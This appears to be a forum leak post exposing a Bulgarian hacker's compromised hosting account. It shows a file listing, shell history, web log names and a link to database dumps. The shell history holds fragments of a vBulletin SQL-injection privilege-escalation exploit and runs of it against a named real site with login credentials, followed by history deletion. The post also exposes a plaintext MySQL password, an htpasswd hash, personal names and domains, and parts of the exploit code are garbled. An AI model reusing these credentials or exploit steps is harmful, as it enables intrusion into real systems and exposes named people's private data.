  36094934 -rw-r--r-- 1 nopasara nopasara 27 Sep 27 2009 robots.txt
  36094031 -rw-r--r-- 1 nopasara nopasara 388 Dec 1 2009 start.png
  36978690 drwxr-xr-x 3 nopasara nopasara 4096 Dec 1 2009 task/
  36094935 -rw-r--r-- 1 nopasara nopasara 5612818 Sep 27 2009 webtech_2009.tar.gz
  36094061 -rw-r--r-- 1 nopasara nopasara 4337 Mar 2 01:21 wp-activate.php
  36094786 drwxr-xr-x 9 nopasara nopasara 4096 Mar 2 01:21 wp-admin/
  36095227 -rw-r--r-- 1 nopasara nopasara 40283 Mar 2 01:21 wp-app.php
  36095228 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-atom.php
  36095229 -rw-r--r-- 1 nopasara nopasara 274 Mar 2 01:21 wp-blog-header.php
  36095230 -rw-r--r-- 1 nopasara nopasara 3931 Mar 2 01:21 wp-comments-post.php
  36095231 -rw-r--r-- 1 nopasara nopasara 244 Mar 2 01:21 wp-commentsrss2.php
  36095232 -rw-r--r-- 1 nopasara nopasara 3177 Mar 2 01:21 wp-config-sample.php
  36095233 -rw-r--r-- 1 nopasara nopasara 1742 Mar 2 01:21 wp-config.php
  36094792 drwxr-xr-x 7 nopasara nopasara 4096 Mar 2 01:25 wp-content/
  36095718 -rw-r--r-- 1 nopasara nopasara 1255 Mar 2 01:21 wp-cron.php
  36095719 -rw-r--r-- 1 nopasara nopasara 246 Mar 2 01:21 wp-feed.php
  36094858 drwxr-xr-x 8 nopasara nopasara 4096 Mar 2 01:21 wp-includes/
  36096099 -rw-r--r-- 1 nopasara nopasara 1997 Mar 2 01:21 wp-links-opml.php
  36096100 -rw-r--r-- 1 nopasara nopasara 2453 Mar 2 01:21 wp-load.php
  36096101 -rw-r--r-- 1 nopasara nopasara 27787 Mar 2 01:21 wp-login.php
  36096102 -rw-r--r-- 1 nopasara nopasara 7774 Mar 2 01:21 wp-mail.php
  36096103 -rw-r--r-- 1 nopasara nopasara 494 Mar 2 01:21 wp-pass.php
  36094141 -rw-r--r-- 1 nopasara nopasara 110415 Mar 2 01:21 wp-pdf.php
  36096104 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rdf.php
  36096105 -rw-r--r-- 1 nopasara nopasara 334 Mar 2 01:21 wp-register.php
  36096106 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rss.php
  36096107 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-rss2.php
  36096108 -rw-r--r-- 1 nopasara nopasara 9655 Mar 2 01:21 wp-settings.php
  36094025 -rw-r--r-- 1 nopasara nopasara 18644 Mar 2 01:21 wp-signup.php
  36096109 -rw-r--r-- 1 nopasara nopasara 3702 Mar 2 01:21 wp-trackback.php
  36096110 -rw-r--r-- 1 nopasara nopasara 3210 Mar 2 01:21 xmlrpc.php
  36094150 -rw-r--r-- 1 nopasara nopasara 4379590656 Sep 10 2010 xorred.iso
  
  [email protected] [/home/nopasara]# cat .bash_history
  #1263692240
  cd public_html/
  #1263692243
  test.php
  #1263692248
  php test.php
  #1263692260
  php test.php <?php
  #1263692260
  print_r('
  -----------------------------------------------------------------------------
  vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
  escalation by session hijacking exploit
  by rgod
  mail: retrog at alice dot it
  site: http://retrogod.altervista.org
  
  Works regardless of php.ini settings, you need a Super Moderator account
  to copy posts among threads, to be launched while admin is logged in to
  the control panel, this will give you full admin privileges
  note: this will flood the forum with empty threads even!
  -----------------------------------------------------------------------------
  ');
  #1263692260
  if ($argc<7) {
  #1263692260
  print_r('
  -----------------------------------------------------------------------------
  Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
  host: target server (ip/hostname)
  path: path to vbulletin
  user/pass: you need a moderator account
  forumid: existing forum
  postid: existing post
  Options:
  -p[port]: specify a port other than 80
  -P[ip:port]: specify a proxy
  Example:
  php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
  php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
  -----------------------------------------------------------------------------
  ');
  #1263692260
  die;
  #1263692260
  }
  #1263692260
  /*
  #1263692260
  vulnerable code in inlinemod.php near lines 185-209:
  #1263692260
  ...
  #1263692260
  
  #1263692260
  ->GPC['postids']);
  #1263692260
  dex => $postid)
  #1263692260
  dex"] != intval($postid))
  {
  unset($postids["$index"]);
  }
  }
  
  if (empty($postids))
  {
  #1263692279
  php test.php
  #1263692305
  php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  #1263692308
  php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  #1263692321
  php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
  #1263692381
  php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  #1263692470
  php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  #1263692489
  Administrator
  #1263692493
  Administrator
  #1263692496
  php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  #1263692539
  cd ..
  #1263692540
  ls
  #1263692547
  rm .bash_history
  #1263692551
  cat .bash_h
  #1263692557
  exit
  #1263831540
  mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
  #1263831932
  mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
  #1263833103
  exit
  #1263832465
  ls -la
  #1263832469
  ls -la
  #1263832491
  vim .bash_history
  #1263832552
  mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
  #1263832751
  mysql --help|grep charset
  #1263832754
  mysql --help|grep char
  #1263832908
  cd public_html/
  #1263832909
  ls
  #1263832912
  cd sverdlov.net/
  #1263832912
  ls
  #1263832923
  vim wp-config.php
  #1263837320
  logou
  #1263837322
  logout
  uname -a;w;id
  cd /home/nopasara
  ls -l
  du -hs .
  cd /home/nopasara
  ls -lia
  
  >> LOL, You're doing it wrong, idiot.
  
  [email protected] [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
  leech:204VnKl0pmERM
  
  [email protected] [/home/nopasara]# ls -l docs
  total 36044
  drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 ./
  drwx--x--x 18 nopasara nopasara 4096 Mar 20 03:01 ../
  -rw-r--r-- 1 nopasara nopasara 1589323 Apr 12 2009 NIST-SP800-42.pdf
  -rw------- 1 nopasara nopasara 1224696 Jan 14 2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
  -rw------- 1 nopasara nopasara 925291 Jan 14 2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
  -rw------- 1 nopasara nopasara 903941 Jan 14 2009 covering_the_tracks_on_mac_os_x_leopard_32993
  -rw------- 1 nopasara nopasara 1000759 Jan 14 2009 current_issues_in_dns_32988
  -rw------- 1 nopasara nopasara 883280 Jan 14 2009 data_carving_concepts_32969
  -rw------- 1 nopasara nopasara 504518 Jan 14 2009 detecting_and_preventing_anonymous_proxy_usage_32943
  -rw------- 1 nopasara nopasara 1856536 Jan 14 2009 document_metadata_the_silent_killer_32974
  -rw------- 1 nopasara nopasara 3193150 Jan 14 2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
  -rw------- 1 nopasara nopasara 825947 Jan 14 2009 evtx_and_windows_event_logging_32949
  -rw------- 1 nopasara nopasara 6815322 Jan 14 2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
  -rw------- 1 nopasara nopasara 2014858 Jan 14 2009 human_being_firewall_32998
  -rw------- 1 nopasara nopasara 631031 Jan 14 2009 intel_ixp_network_processor_based_intrusion_detection_32919
  -rw------- 1 nopasara nopasara 343988 Jan 14 2009 intrusion_detection_likelihood_a_riskbased_approach_32938
  -rw------- 1 nopasara nopasara 516554 Jan 14 2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
  -rw------- 1 nopasara nopasara 426055 Jan 14 2009 manager_bg_2009.pdf
  -rw------- 1 nopasara nopasara 461473 Jan 14 2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
  -rw------- 1 nopasara nopasara 808979 Jan 14 2009 net_framework_rootkits_backdoors_inside_your_framework_32954
  -rw------- 1 nopasara nopasara 981363 Jan 14 2009 os_and_application_fingerprinting_techniques_32923
  -rw------- 1 nopasara nopasara 1083363 Jan 14 2009 paper32988.pdf
  -rw------- 1 nopasara nopasara 1574638 Jan 14 2009 security_considerations_for_avaya_ess_implementation_32984
  -rw------- 1 nopasara nopasara 485204 Jan 14 2009 security_incident_handling_in_small_organizations_32979
  -rw------- 1 nopasara nopasara 482489 Jan 14 2009 skype_a_practical_security_analysis_32918
  -rw------- 1 nopasara nopasara 470634 Jan 14 2009 social_engineering_manipulating_the_source_32914
  -rw------- 1 nopasara nopasara 732651 Jan 14 2009 the_importance_of_security_awareness_training_33013
  -rw------- 1 nopasara nopasara 1143981 Jan 14 2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
  -rw------- 1 nopasara nopasara 4844265 Jan 14 2009 valsmith_dquist_hacking_malware.pdf
  
  [email protected] [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
  total 128288
  drwxr-x--- 2 root nopasara 4096 Feb 28 14:26 ./
  drwx--x--x 654 root wheel 765952 Mar 20 03:03 ../
  -rw-r----- 2 root nopasara 39096 Mar 20 01:19 bgsecrets.oss.bg
  -rw-r----- 2 root nopasara 294111 Jul 10 2009 blog.nopasara.bg
  -rw-r----- 2 root nopasara 6791 Mar 16 21:06 blog.oss.bg
  -rw-r----- 2 root nopasara 15280 Mar 16 21:22 cdn.oss.bg
  -rw-r----- 2 root nopasara 927221 Jul 4 2009 cmdb.nopasara.bg
  -rw-r----- 2 root nopasara 0 Jan 31 2010 cmdb.oss.bg
  -rw-r----- 2 root nopasara 227423 Jul 4 2009 crm.nopasara.bg
  -rw-r----- 2 root nopasara 0 Jan 31 2010 crm.oss.bg
  -rw-r----- 2 root nopasara 101328 Mar 20 02:10 demo.oss.bg
  -rw-r----- 2 root nopasara 2399652 Mar 20 01:57 emeastudio.oss.bg
  -rw-r----- 2 root nopasara 0 Jan 31 00:25 eye.oss.bg
  -rw-r----- 2 root nopasara 0 Aug 31 2009 ftp.nopasara.bg-ftp_log
  -rw-r----- 2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
  -rw-r----- 2 root nopasara 29481 Dec 28 2009 hipopotuk.oss.bg
  -rw-r----- 2 root nopasara 80008 Mar 20 01:44 ioscompatible.oss.bg
  -rw-r----- 2 root nopasara 121645 Oct 3 13:24 logostudio.oss.bg
  -rw-r----- 2 root nopasara 0 Aug 31 2009 nopasara.bg
  -rw-r----- 2 root nopasara 39153 Sep 16 2009 nopasara.oss.bg
  -rw-r----- 2 root nopasara 0 Dec 10 2008 nopasaran.bg
  -rw-r----- 2 root nopasara 259906 Mar 20 02:54 oss.bg
  -rw-r----- 2 root nopasara 104114 Feb 5 11:21 osseu.oss.bg
  -rw-r----- 2 root nopasara 0 Jun 30 2009 play.nopasara.bg
  -rw-r----- 2 root nopasara 0 Jul 10 2009 play.oss.bg
  -rw-r----- 2 root nopasara 10374402 Mar 20 03:02 securityguy.oss.bg
  -rw-r--r-- 2 root root 375448 Jul 28 2009 studio.oss.bg
  -rw-r----- 2 root nopasara 74486 Mar 19 20:47 studioburgas.oss.bg
  -rw-r----- 2 root nopasara 729044 Jul 4 2009 support.nopasara.bg
  -rw-r----- 2 root nopasara 0 Jul 10 2009 support.oss.bg
  -rw-r----- 2 root nopasara 2114965 Mar 20 02:54 sverdlov.oss.bg
  -rw-r----- 2 root nopasara 72848 Mar 20 02:42 test.oss.bg
  -rw-r----- 2 root nopasara 0 Jan 31 00:25 topusahostingproviders.oss.bg
  -rw-r----- 2 root nopasara 0 Jan 31 00:25 tragedyworld.oss.bg
  -rw-r----- 2 root nopasara 141532 Mar 20 02:53 web.oss.bg
  -rw-r----- 2 root nopasara 140 Aug 1 2009 weboffice.oss.bg
  -rw-r----- 2 root nopasara 137076 Mar 16 02:38 wo.oss.bg
  
  >> Check the URL for database dumps, etc.
  
  Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.
  
  Here's the URL for the various dumps -
  http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html
  
  Get back to [email protected] for non-published details, packet captures, some more database dumps, etc.

Welcome to official forums on FreeUniBG @ Network

SlaserX - Bulgarian Hacker Details Exposed

SlaserX - Bulgarian Hacker Details Exposed